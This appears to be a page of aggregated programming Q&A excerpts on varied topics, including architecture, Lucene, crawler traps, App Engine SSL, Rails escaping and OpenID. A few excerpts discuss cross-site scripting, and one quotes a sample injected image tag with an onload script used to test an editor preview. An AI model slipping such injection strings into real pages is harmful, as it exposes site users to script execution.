Search Results

Search found 471 results on 19 pages for 'hole punching'.

Page 16/19 | < Previous Page | 12 13 14 15 16 17 18 19  | Next Page >

  • Architectural conundrum

    - by Dejan
    The worst thing when working on a one man project is the lack of input that you usually get from your coworkers. And because of the lack of that you tend to make obvious mistakes. After going down that road for some time I would need some help from the community. I started a little home-brew project that should turn into a portal of some sorts. And the main thing that is bothering me is the persistence layer that i have concocted. It should be completely separated from the presentation layer for starters and a OR mapper is also somewhere. This is because I have multiple data stores that have to be used. So the base idea was that the individual "repositories" operate each on their individual database and that the business layer then aggregates the business objects which are then transformed in the presentation layer into view objects. The main problem I face is the following: Multiple classes for the same concept - There is a DAL representation of a user and BL representation of user and a view representation of a user. I can handle the transformation with a tool but is this really the right way. I mean they are all nicely separated, but the overhead is quite something. What do you think? Am I going too deep into the separation of concern rabbit hole or is this still normal?

    Read the article

  • What harm can javascript do?

    - by The King
    I just happen to read the joel's blog here... So for example if you have a web page that says “What is your name?” with an edit box and then submitting that page takes you to another page that says, Hello, Elmer! (assuming the user’s name is Elmer), well, that’s a security vulnerability, because the user could type in all kinds of weird HTML and JavaScript instead of “Elmer” and their weird JavaScript could do narsty things, and now those narsty things appear to come from you, so for example they can read cookies that you put there and forward them on to Dr. Evil’s evil site. Since javascript runs on client end. All it can access or do is only on the client end. It can read informations stored in hidden fields and change them. It can read, write or manipulate cookies... But I feel, these informations are anyway available to him. (if he is smart enough to pass javascript in a textbox. So we are not empowering him with new information or providing him undue access to our server... Just curious to know whether I miss something. Can you list the things that a malicious user can do with this security hole. Edit : Thanks to all for enlightening . As kizzx2 pointed out in one of the comments... I was overlooking the fact that a JavaScript written by User A may get executed in the browser of User B under numerous circumstances, in which case it becomes a great risk.

    Read the article

  • Is functional GUI programming possible?

    - by eman
    I've recently caught the FP bug (trying to learn Haskell), and I've been really impressed with what I've seen so far (first-class functions, lazy evaluation, and all the other goodies). I'm no expert yet, but I've already begun to find it easier to reason "functionally" than imperatively for basic algorithms (and I'm having trouble going back where I have to). The one area where current FP seems to fall flat, however, is GUI programming. The Haskell approach seems to be to just wrap imperative GUI toolkits (such as GTK+ or wxWidgets) and to use "do" blocks to simulate an imperative style. I haven't used F#, but my understanding is that it does something similar using OOP with .NET classes. Obviously, there's a good reason for this--current GUI programming is all about IO and side effects, so purely functional programming isn't possible with most current frameworks. My question is, is it possible to have a functional approach to GUI programming? I'm having trouble imagining what this would look like in practice. Does anyone know of any frameworks, experimental or otherwise, that try this sort of thing (or even any frameworks that are designed from the ground up for a functional language)? Or is the solution to just use a hybrid approach, with OOP for the GUI parts and FP for the logic? (I'm just asking out of curiosity--I'd love to think that FP is "the future," but GUI programming seems like a pretty large hole to fill.)

    Read the article

  • Codeplex/Sourceforge for internal use

    - by Josh
    I'm looking for a free/open source collaborative project manager that can be deployed internally in my workplace that would act similar to Codeplex or Sourceforge. Does anyone know of something like this, and if so do you have experience with it. Requirements: Open Source or Free Locally Deployable Has the same types of features found in Sourceforge / Codeplex Issue/Feature Tracking Community Interaction (ie. Voting, Roles, etc.) SCM Integration (Optional) .NET/Windows Friendly (Optional) Every business ends up having internal utilities, and domain specific apps that developers create to make life easier. Given the input of the internal developer community they have the potential to become much better (can you say GMail...), and I would simply like to foster such an environment internally by providing an easy place for that interaction to take place. UPDATE: So I like what I am seeing in both Trac and GForge, but both are heavily geared towards UNIX/Subversion environments. I should have specified this, but we are a MS shop from top to bottom. How practical do you think it is going to be to try and use these in a MS .NET environment? Would that be like trying to shove a square peg through a round hole?

    Read the article

  • How to restrain one's self from the overwhelming urge to rewrite everything?

    - by Scott Saad
    Setup Have you ever had the experience of going into a piece of code to make a seemingly simple change and then realizing that you've just stepped into a wasteland that deserves some serious attention? This usually gets followed up with an official FREAK OUT moment, where the overwhelming feeling of rewriting everything in sight starts to creep up. It's important to note that this bad code does not necessarily come from others as it may indeed be something we've written or contributed to in the past. Problem It's obvious that there is some serious code rot, horrible architecture, etc. that needs to be dealt with. The real problem, as it relates to this question, is that it's not the right time to rewrite the code. There could be many reasons for this: Currently in the middle of a release cycle, therefore any changes should be minimal. It's 2:00 AM in the morning, and the brain is starting to shut down. It could have seemingly adverse affects on the schedule. The rabbit hole could go much deeper than our eyes are able to see at this time. etc... Question So how should we balance the duty of continuously improving the code, while also being a responsible developer? How do we refrain from contributing to the broken window theory, while also being aware of actions and the potential recklessness they may cause? Update Great answers! For the most part, there seems to be two schools of thought: Don't resist the urge as it's a good one to have. Don't give in to the temptation as it will burn you to the ground. It would be interesting to know if more people feel any balance exists.

    Read the article

  • Lucene (.NET) Document stucture and performance suggestions.

    - by Josh Handel
    Hello, I am indexing about 100M documents that consist of a few string identifiers and a hundred or so numaric terms.. I won't be doing range queries, so I haven't dugg too deep into Numaric Field but I'm not thinking its the right choose here. My problem is that the query performance degrades quickly when I start adding OR criteria to my query.. All my queries are on specific numaric terms.. So a document looks like StringField:[someString] and N DataField:[someNumber].. I then query it with something like DataField:((+1 +(2 3)) (+75 +(3 5 52)) (+99 +88 +(102 155 199))). Currently these queries take about 7 to 16 seconds to run on my laptop.. I would like to make sure thats really the best they can do.. I am open to suggestions on field structure and query structure :-). Thanks Josh PS: I have already read over all the other lucene performance discussions on here, and on the Lucene wiki and at lucid imiagination... I'm a bit further down the rabbit hole then that...

    Read the article

  • Data mining - parsing a log file in Java

    - by nuvio
    Hello I am carrying on a Java project for the university, where I should analyse poker hands. I found some poker hands in a txt log file. They would typically look like this: PokerStars Zoom Hand #86981279921: Hold'em No Limit ($0.10/$0.25 USD) - 2012/09/30 23:49:51 ET Table 'Whirlpool Zoom 40-100 bb' 9-max Seat #1 is the button Seat 1: lgwong ($30.99 in chips) Seat 2: hastyboots ($28.61 in chips) Seat 3: seula i ($25.31 in chips) Seat 4: fr_kevin01 ($31.81 in chips) Seat 5: limey05 ($27.45 in chips) Seat 6: sanlu ($24.65 in chips) Seat 7: Masterfrank ($25.35 in chips) Seat 8: Refu$e2Lose ($33.23 in chips) Seat 9: 1pepepe0114 ($37.62 in chips) hastyboots: posts small blind $0.10 seula i: posts big blind $0.25 *** HOLE CARDS *** fr_kevin01: folds limey05: folds sanlu: folds Masterfrank: folds Refu$e2Lose: folds 1pepepe0114: folds lgwong: folds hastyboots: folds Uncalled bet ($0.15) returned to seula i seula i collected $0.20 from pot seula i: doesn't show hand *** SUMMARY *** Total pot $0.20 | Rake $0 Seat 1: lgwong (button) folded before Flop (didn't bet) Seat 2: hastyboots (small blind) folded before Flop Seat 3: seula i (big blind) collected ($0.20) Seat 4: fr_kevin01 folded before Flop (didn't bet) Seat 5: limey05 folded before Flop (didn't bet) Seat 6: sanlu folded before Flop (didn't bet) Seat 7: Masterfrank folded before Flop (didn't bet) Seat 8: Refu$e2Lose folded before Flop (didn't bet) Seat 9: 1pepepe0114 folded before Flop (didn't bet) My problem is that I am not sure about how to proceed to parse the log file: the only knowledge I have is "manually" scanning line by line for a particular character or symbol, but I am afraid it would need exhaustive error handling. So I was wandering if there is any other techniques or better way to parse these poker hands? Many thanks for your help

    Read the article

  • prevent javascript in the WMD editor's preview box

    - by Justin Grant
    There are many SO questions (e.g. here and here) about how to do server-side scrubbing of Markdown produced by the WMD editor to ensure the HTML generated doesn't contain malicious script, like this: <img onload="alert('haha');" src="http://www.google.com/intl/en_ALL/images/srpr/logo1w.png" /> Unfortunately, this still allows script to show up in the WMD client's preview box. I doubt this is a big deal since if you're scrubbing the HTML on the server, an attacker can't save the bad HTML so no one else will be able to see it later and have their cookies stolen or sessions hijacked by the bad script. But it's still kinda odd to allow an attacker to run any script in the context of your site, and it's probably a bad idea to allow the client preview window to allow different HTML than your server will allow. StackOverflow has clearly plugged this hole. How did they do it? [NOTE: I already figured this out but it required some tricky javascript debugging, so I'm answering my own question here to help others who may want to do ths same thing]

    Read the article

  • What techniques can be used to detect so called "black holes" (a spider trap) when creating a web crawler?

    - by Tom
    When creating a web crawler, you have to design somekind of system that gathers links and add them to a queue. Some, if not most, of these links will be dynamic, which appear to be different, but do not add any value as they are specifically created to fool crawlers. An example: We tell our crawler to crawl the domain evil.com by entering an initial lookup URL. Lets assume we let it crawl the front page initially, evil.com/index The returned HTML will contain several "unique" links: evil.com/somePageOne evil.com/somePageTwo evil.com/somePageThree The crawler will add these to the buffer of uncrawled URLs. When somePageOne is being crawled, the crawler receives more URLs: evil.com/someSubPageOne evil.com/someSubPageTwo These appear to be unique, and so they are. They are unique in the sense that the returned content is different from previous pages and that the URL is new to the crawler, however it appears that this is only because the developer has made a "loop trap" or "black hole". The crawler will add this new sub page, and the sub page will have another sub page, which will also be added. This process can go on infinitely. The content of each page is unique, but totally useless (it is randomly generated text, or text pulled from a random source). Our crawler will keep finding new pages, which we actually are not interested in. These loop traps are very difficult to find, and if your crawler does not have anything to prevent them in place, it will get stuck on a certain domain for infinity. My question is, what techniques can be used to detect so called black holes? One of the most common answers I have heard is the introduction of a limit on the amount of pages to be crawled. However, I cannot see how this can be a reliable technique when you do not know what kind of site is to be crawled. A legit site, like Wikipedia, can have hundreds of thousands of pages. Such limit could return a false positive for these kind of sites. Any feedback is appreciated. Thanks.

    Read the article

  • How do I configure multiple Ubuntu Python installations to avoid App Engine's SSL error?

    - by Linc
    I have Karmic Koala which has Python 2.6 installed by default. However I can't run any Python App Engine projects because they require Python 2.5 and python ssl. To install ssl I installed python2.5-dev first while following some instructions I found elsewhere. sudo apt-get install libssl-dev sudo apt-get install python-setuptools sudo apt-get install python2.5-dev sudo easy_install-2.5 pyopenssl However, I am afraid this is not good for my Ubuntu installation since Ubuntu expects to see version 2.6 of Python when you type 'python' on the command line. Instead, it says '2.5.5'. I tried to revert to the original default version of Python by doing this: sudo apt-get remove python2.5-dev But that didn't seem to do anything either - when I type 'python' on the command line it still say 2.5.5. And App Engine still doesn't work after all this. I continue to get an SSL-related error whenever I try to run my Python app: AttributeError: 'module' object has no attribute 'HTTPSHandler' UPDATE: Just checked whether SSL actually installed as a result of those commands by typing this: $ python2.5 Python 2.5.5 (r255:77872, Apr 29 2010, 23:59:20) [GCC 4.4.1] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import ssl Traceback (most recent call last): File "<stdin>", line 1, in <module> ImportError: No module named ssl >>> As you can see, SSL is still not installed, which explains the continuing App Engine error. If anyone knows how I can dig myself out of this hole, I would appreciate it.

    Read the article

  • what to do when you are completely burnt out from working on a project ?

    - by dfafa
    so i started this SaaS project around July 2009, was expecting to finish it in 2 months. i ended up working on it for about 4 months straight, spending about 6~12 hours nearly everyday. then one day i just couldn't bare to look at the code. it seems like my efforts are being sucked in by some black hole. i would need to put lot of work to make incremental changes. i felt burnt out in December....and now it's May. i am working on the project maybe for about 10 hours every 2 weeks...i am not getting much done. it seems like it will never be perfect. the more i code, more problems and bugs to fix, its absolutely sickening. so what should i do now ? i have invested all of my available time and money, i've shut off all social connections and basically have been spending most of my time in my room working on my project alone. i feel consumed by this project i created ironically, to make my life easier.

    Read the article

  • Multiple inputs on a single line with Twitter Bootstrap and Simple Form 2.0

    - by noel_g
    I am using simple_form 2.0 with twitter bootstrap. I am trying to determine what is the proper wrapper format in order to get something like [city] [State] [Zip] I believe my form needs to be <div class="control-group"> <%= f.input :city,:wrapper => :small, :placeholder => "City", :input_html => { :class=>"span2", :maxlength => 10},:label => false %> <%= f.input :region, :wrapper => :small , :placeholder => "Region", :input_html => { :class=>"span1", :maxlength => 5}, :label => false %> <%= f.input :postal_code, :wrapper => :small, :placeholder => "Postal Code",:input_html => { :class=>"span2", :maxlength => 10},:label => false %> </div> I tried this wrapper config.wrappers :small, :tag => 'div', :class => 'controls inline-inputs', :error_class => 'error' do |b| b.use :placeholder b.use :label_input end I believe I would need to define the CSS as well, but before I go down a rabbit hole I thought I would ask if this is built in somewhere.

    Read the article

  • Why can I call a non-const member function pointer from a const method?

    - by sdg
    A co-worker asked about some code like this that originally had templates in it. I have removed the templates, but the core question remains: why does this compile OK? #include <iostream> class X { public: void foo() { std::cout << "Here\n"; } }; typedef void (X::*XFUNC)() ; class CX { public: explicit CX(X& t, XFUNC xF) : object(t), F(xF) {} void execute() const { (object.*F)(); } private: X& object; XFUNC F; }; int main(int argc, char* argv[]) { X x; const CX cx(x,&X::foo); cx.execute(); return 0; } Given that CX is a const object, and its member function execute is const, therefore inside CX::execute the this pointer is const. But I am able to call a non-const member function through a member function pointer. Are member function pointers a documented hole in the const-ness of the world? What (presumably obvious to others) issue have we missed?

    Read the article

  • Preventing HTML character entities in locale files from getting munged by Rails3 xss protection

    - by Chris S
    We're building an app, our first using Rails 3, and we're having to build I18n in from the outset. Being perfectionists, we want real typography to be used in our views: dashes, curled quotes, ellipses et al. This means in our locales/xx.yml files we have two choices: Use real UTF-8 characters inline. Should work, but hard to type, and scares me due to the amount of software which still does naughty things to unicode. Use HTML character entities (&#8217; &#8212; etc). Easier to type, and probably more compatible with misbehaving software. I'd rather take the second option, however the auto-escaping in Rails 3 makes this problematic, as the ampersands in the YAML get auto-converted into character entities themselves, resulting in 'visible' &8217;s in the browser. Obviously this can be worked around by using raw on strings, i.e.: raw t('views.signup.organisation_details') But we're not happy going down the route of globally raw-ing every time we t something as it leaves us open to making an error and producing an XSS hole. We could selectively raw strings which we know contain character entities, but this would be hard to scale, and just feels wrong - besides, a string which contains an entity in one language may not in another. Any suggestions on a clever rails-y way to fix this? Or are we doomed to crap typography, xss holes, hours of wasted effort or all thre?

    Read the article

  • joomla and allow_url_fopen [closed]

    - by liz
    so i have been reading of the pros and cons of allowing: allow_url_fopen. but i am still confused. after a recent hacking incident (which i believe had nothing to do with allow_url_fopen) my host turned allow_url_fopen off. so the thing i dont get is, in joomla 2.5.x there is an updating feature.you can search for new versions and be notified if things are out of date. there is a big security hole if joomla or its extensions get out of date. But the catch it needs allow_url_fopen turned on. so why did joomla build a security risk into a feature to improve security??is it okay to turn allow_url_fopen on and have the updating feature? to clarify: my question is. i have Joomla installed. I have CURl installed. when i run the discover updates through NATIVE joomla i get a request for fopen. shouldn't i not need to enable a security risk? i am running version 2.5.8 of joomla.

    Read the article

  • What is the benefit of using ONLY OpenID authentication on a site?

    - by Peter
    From my experience with OpenID, I see a number of significant downsides: Adds a Single Point of Failure to the site It is not a failure that can be fixed by the site even if detected. If the OpenID provider is down for three days, what recourse does the site have to allow its users to login and access the information they own? Takes a user to another sites content and every time they logon to your site Even if the OpenID provider does not have an error, the user is re-directed to their site to login. The login page has content and links. So there is a chance a user will actually be drawn away from the site to go down the Internet rabbit hole. Why would I want to send my users to another company's website? [ Note: my provider no longer does this and seems to have fixed this problem (for now).] Adds a non-trivial amount of time to the signup To sign up with the site a new user is forced to read a new standard, chose a provider, and signup. Standards are something that the technical people should agree to in order to make a user experience frictionless. They are not something that should be thrust on the users. It is a Phisher's Dream OpenID is incredibly insecure and stealing the person's ID as they log in is trivially easy. [ taken from David Arno's Answer below ] For all of the downside, the one upside is to allow users to have fewer logins on the Internet. If a site has opt-in for OpenID then users who want that feature can use it. What I would like to understand is: What benefit does a site get for making OpenID mandatory?

    Read the article

  • Can I get debug symbols for flash player? Or any other way to get support for flash?

    - by Tim
    The company I am working for has a flash component (using flex and cs4) that crashes intermittently in chrome, FF and IE. (so far only win32 platforms) I submitted a bug report to Adobe but have not heard anything back from them. Their support process seems like a black hole. WE can get a dump from Flash using these steps but after submitting the bug we got no help at all. We loaded this into MS visual studio but can;t get decent stack information because there are no symbols for the flash stuff. Microsoft and other companies provide symbols to help with debugging and we would like to get that from adobe. Is there any way to make progress on this? Does anyone know where to get flash symbols or how else we can make progress? It is hard to debug the process if the container just dies. the binary is flash10c.ocx I just spent a painful hour on the phone with adobe folks - and the final answer from one of them (I spoke to about 8 people) was that they do not have a per incident purchase plan for developer support for flash. I find that hard to believe. Does anyone know how to get support for Flash?

    Read the article

  • Potential problem with C standard malloc'ing chars.

    - by paxdiablo
    When answering a comment to another answer of mine here, I found what I think may be a hole in the C standard (c1x, I haven't checked the earlier ones and yes, I know it's incredibly unlikely that I alone among all the planet's inhabitants have found a bug in the standard). Information follows: Section 6.5.3.4 ("The sizeof operator") para 2 states "The sizeof operator yields the size (in bytes) of its operand". Para 3 of that section states: "When applied to an operand that has type char, unsigned char, or signed char, (or a qualified version thereof) the result is 1". Section 7.20.3.3 describes void *malloc(size_t sz) but all it says is "The malloc function allocates space for an object whose size is specified by size and whose value is indeterminate". It makes no mention at all what units are used for the argument. Annex E startes the 8 is the minimum value for CHAR_BIT so chars can be more than one byte in length. My question is simply this: In an environment where a char is 16 bits wide, will malloc(10 * sizeof(char)) allocate 10 chars (20 bytes) or 10 bytes? Point 1 above seems to indicate the former, point 2 indicates the latter. Anyone with more C-standard-fu than me have an answer for this?

    Read the article

  • How might one cope with the ambiguous value produced by GetDllDirectory?

    - by Integer Poet
    GetDllDirectory produces an ambiguous value. When the string this call produces is empty, it means one of the following: nobody has called SetDllDirectory somebody passed NULL to SetDllDirectory somebody passed an empty string to SetDllDirectory The first two cases are equivalent for my purposes, but the third case is a problem. If I want to write save/restore code (call GetDllDirectory to save the "old" value, SetDllDirectory to set a "new" value temporarily, and later SetDllDirectory again to restore the "old" value), I run the risk of reversing some other programmer's intent. If the other programmer intended for the current working directory to be in the DLL search order (in other words, one of the first two bullets is true), and I pass an empty string to SetDllDirectory, I will be taking the current working directory out of the DLL search order, reversing the other programmer's intent. Can anyone suggest an approach to eliminate or work around this ambiguity? P.S. I know having the current working directory in the DLL search order could be interpreted as a security hole. Nevertheless, it is the default behavior, and my code is not in a position to undo that; my code needs to be compatible with the expectations of all potential callers, many of which are large and old and beyond my control.

    Read the article

  • Cookie blocked/not saved in IFRAME in Internet Explorer

    - by Piskvor
    I have two websites, let's say they're example.com and anotherexample.net. On anotherexample.net/page.html, I have an IFRAME SRC="http://example.com/someform.asp". That IFRAME displays a form for the user to fill out and submit to http://example.com/process.asp. When I open the form ("someform.asp") in its own browser window, all works well. However, when I load someform.asp as an IFRAME in IE 6 or IE 7, the cookies for example.com are not saved. In Firefox this problem doesn't appear. For testing purposes, I've created a similar setup on http://newmoon.wz.cz/test/page.php . example.com uses cookie-based sessions (and there's nothing I can do about that), so without cookies, process.asp won't execute. How do I force IE to save those cookies? Results of sniffing the HTTP traffic: on GET /someform.asp response, there's a valid per-session Set-Cookie header (e.g. Set-Cookie: ASPKSJIUIUGF=JKHJUHVGFYTTYFY), but on POST /process.asp request, there is no Cookie header at all. Edit3: some AJAX+serverside scripting is apparently capable to sidestep the problem, but that looks very much like a bug, plus it opens a whole new set of security holes. I don't want my applications to use a combination of bug+security hole just because it's easy. Edit: the P3P policy was the root cause, full explanation below.

    Read the article

  • How do you use stl's functions like for_each?

    - by thomas-gies
    I started using stl containers because they came in very handy when I needed functionality of a list, set and map and had nothing else available in my programming environment. I did not care much about the ideas behind it. STL documentations were only interesting up to the point where it came to functions, etc. Then I skipped reading and just used the containers. But yesterday, still being relaxed from my holidays, I just gave it a try and wanted to go a bit more the stl way. So I used the transform function (can I have a little bit of applause for me, thank you). From an academic point of view it really looked interesting and it worked. But the thing that boroughs me is that if you intensify the use of those functions, you need 10ks of helper classes for mostly everything you want to do in your code. The hole logic of the program is sliced in tiny pieces. This slicing is not the result of god coding habits. It's just a technical need. Something, that makes my life probably harder not easier. And I learned the hard way, that you should always choose the simplest approach that solves the problem at hand. And I can't see what, for example, the for_each function is doing for me that justifies the use of a helper class over several simple lines of code that sit inside a normal loop so that everybody can see what is going on. I would like to know, what you are thinking about my concerns? Did you see it like I do when you started working this way and have changed your mind when you got used to it? Are there benefits that I overlooked? Or do you just ignore this stuff as I did (and will go an doing it, probably). Thanks. PS: I know that there is a real for_each loop in boost. But I ignore it here since it is just a convenient way for my usual loops with iterators I guess.

    Read the article

  • Rewarding iOS app beta testers with in app purchase?

    - by Partridge
    My iOS app is going to be free, but with additional functionality enabled via in app purchase. Currently beta testers are doing a great job finding bugs and I want to reward them for their hard work. I think the least I can do is give them a full version of the app so that they don't have to buy the functionality themselves. However, I'm not sure what the best way to do this is. There do not appear to be promo codes for in app purchase so I can't just email out promo codes. I have all the tester device UDIDs so when the app launches I could grab the device UDID and compare it to an internal list of 'approved' UDIDs. Is this what other developers do? My concerns: The in app purchase content would not be tied to their iTunes account, so if beta testers move to a new device they would not be able to enable the content unless I released a new build in the app store with their new UDID. So they may have to buy it eventually anyway. Having an internal list leaves a hole for hackers to modify the list and add themselves to it. What would you do?

    Read the article

  • Ruby core documentation quality

    - by karatedog
    I'm relatively new to Ruby and have limited time therefore I try out simple things. Recently I needed to create a file and because I'm lazy as hell, I run to Google. The result: File.open(local_filename, 'w') {|f| f.write(doc) } Shame on me, it is very straightforward, should have done it myself. Then I wanted to check what ruby magic the File class' methods offer or if there's any 'simplification' when invoking those methods, so I headed for the documentation here, and checked for the File class. 1.8.6 documentation presents me with "ftools.rb: Extra tools for the File class" under 'File' class, which is not what I'm looking for. 1.8.7 documentation seems OK for 'File' class, there are a plethora of methods. Except 'open'. 1.9 documentation finally shows me the 'open' method. And I had an almost same tour with Net::HTTP. Do I exaggerate when I think good old Turbo Pascal's 7.0 documentation was better organized than Ruby documentation is right now? Is there any other source for the uninitiated to collect knowledge? Or is it possible that I just tumbled into a documentation hole and the rest are super-brilliant-five-star organized? Thanks

    Read the article

  • Giving writing permissions for IIS user at Windows 2003 Server

    - by Steve
    I am running a website over Windows 2003 Server and IIS6 and I am having problems to write or delete files in some temporary folder obtaining this kind of warmings: Warning: unlink(C:\Inetpub\wwwroot\cakephp\app\tmp\cache\persistent\myapp_cake_core_cake_): Permission denied in C:\Inetpub\wwwroot\cakephp\lib\Cake\Cache\Engine\FileEngine.php on line 254 I went to the tmp directory and at the properties I gave the IIS User the following permissions: Read & Execute List folder Contents Read And it still showing the same warnings. When I am on the properties window, if I click on Advanced the IIS username appears twice. One with Allow type and read & execute permissions and the other with Deny type and Special permissions. My question is: Should I give this user not only the Read & Execute permissions but also this ones?: Create Attributes Create Files/ Write Data Create Folders/ Append Data Delete Subfolders and Files Delete They are available to select if I Click on the edit button over the username. Wouldn't I be opening a security hole if I do this? Otherwise, how can I do to read and delete the files my website uses? Thanks.

    Read the article

  • How to access a web service behind a NAT?

    - by jr
    We have a product we are deploying to some small businesses. It is basically a RESTful API over SSL using Tomcat. This is installed on the server in the small business and is accessed via an iPhone or other device portable device. So, the devices connecting to the server could come from any number of IP addresses. The problem comes with the installation. When we install this service, it seems to always become a problem when doing port forwarding so the outside world can gain access to tomcat. It seems most time the owner doesn't know router password, etc, etc. I am trying to research other ways we can accomplish this. I've come up with the following and would like to hear other thoughts on the topic. Setup a SSH tunnel from each client office to a central server. Basically the remote devices would connect to that central server on a port and that traffic would be tunneled back to Tomcat in the office. Seems kind of redundant to have SSH and then SSL, but really no other way to accomplish it since end-to-end I need SSL (from device to office). Not sure of performance implications here, but I know it would work. Would need to monitor the tunnel and bring it back up if it goes done, would need to handle SSH key exchanges, etc. Setup uPNP to try and configure the hole for me. Would likely work most of the time, but uPNP isn't guaranteed to be turned on. May be a good next step. Come up with some type of NAT transversal scheme. I'm just not familiar with these and uncertain of how they exactly work. We have access to a centralized server which is required for the authentication if that makes it any easier. What else should I be looking at to get this accomplished?

    Read the article

< Previous Page | 12 13 14 15 16 17 18 19  | Next Page >